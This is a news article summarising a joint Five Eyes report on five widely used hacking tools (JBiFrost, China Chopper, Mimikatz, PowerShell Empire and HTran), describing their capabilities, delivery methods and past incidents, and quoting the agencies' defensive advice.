The national cybersecurity agencies of the United States, U.K., Canada, Australia and New Zealand, known in the intelligence world as the Five Eyes, have released a joint report on five publicly available hacking tools that are widely used in cyberattacks.
The report advises defenders on how to detect and protect systems against a remote access Trojan called JBiFrost, a webshell called China Chopper, a credential stealer called Mimikatz, a lateral movement framework called PowerShell Empire and a traffic obfuscation proxy called HUC Packet Transmitter.
“These tools have been used to compromise information across a wide range of critical sectors, including health, finance, government and defence,” the report authors said. “Their widespread availability presents a challenge for network defence and actor attribution.”
JBiFrost first appeared in May 2015 and is a variant of Adwind RAT, a program that has been used by APT groups in the past to target organizations from the aerospace and defense sectors.
Remote Access Trojans (RATs) provide attackers with administrative control over compromised computers and are often used to exfiltrate data and to deploy other tools that could allow attackers to pivot to other computers on local networks.
JBiFrost is written in Java and has versions for Windows, Linux, macOS and Android. It’s usually delivered as an attachment through phishing emails that pose as invoice notices, requests for quotation, remittance notices and shipment or payment notices.
“Since early 2018, we have observed an increase in JBiFrost RAT being used in targeted attacks against critical national infrastructure owners and their supply chain operators,” US-CERT said in an alert. “There has also been an increase in the RAT’s hosting on infrastructure located in our countries.”
China Chopper is a widely used webshell that’s been in use since 2012. Webshells are small scripts that typically are deployed on compromised web servers to provide remote attackers with administrative access.
Over the past few months, attackers have been observed deploying China Chopper on web servers vulnerable to CVE-2017-3066, a remote code execution vulnerability in Adobe ColdFusion.
Mimikatz is a tool created in 2007 that can extract Windows credentials from infected computers. The tool is widely used by both penetration testers and hackers to obtain Windows domain credentials that enable lateral movement inside networks.
“Mimikatz has been used across multiple incidents by a broad range of threat actors for several years,” the US-CERT said in its alert. “In 2011, it was used by unknown threat actors to obtain administrator credentials from the Dutch certificate authority, DigiNotar. The rapid loss of trust in DigiNotar led to the company filing for bankruptcy within a month of this compromise.”
Mimikatz was also used in the NotPetya and BadRabbit ransomware attacks last year, enabling those threats to propagate through poorly secured networks.
“To prevent Mimikatz credential retrieval, network defenders should disable the storage of clear text passwords in LSASS memory,” the report authors advise. “This is default behavior for Windows 8.1/Server 2012 R2 and later, but can be specified on older systems which have the relevant security patches installed. Windows 10 and Windows Server 2016 systems can be protected by using newer security features, such as Credential Guard.”
PowerShell Empire is a post-exploitation framework that was designed in 2015 as a penetration testing tool. It uses the legitimate PowerShell scripting language, which is intended for automating Windows management tasks, and can operate entirely in memory, making it difficult to detect.
PowerShell Empire provides attackers with the ability to escalate privileges, harvest credentials, exfiltrate information and move laterally across a network. It is popular with both state-actor hacker groups and cybercriminals and has been observed in security breaches across a wide range of sectors.
The HUC Packet Transmitter (HTran) is a proxy tool that dates back to 2009 and is capable of intercepting and redirecting TCP traffic. Attackers often use it to obfuscate malicious traffic or to proxy their communications through legitimate servers.
HTran can be used to evade intrusion detection systems on a network, bypass security controls by blending malicious traffic into common traffic to abuse domain trust relationships and to hide malware command-and-control communications.
“Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques,” the report authors said. “Even the most sophisticated groups use common, publicly-available tools to achieve their objectives.”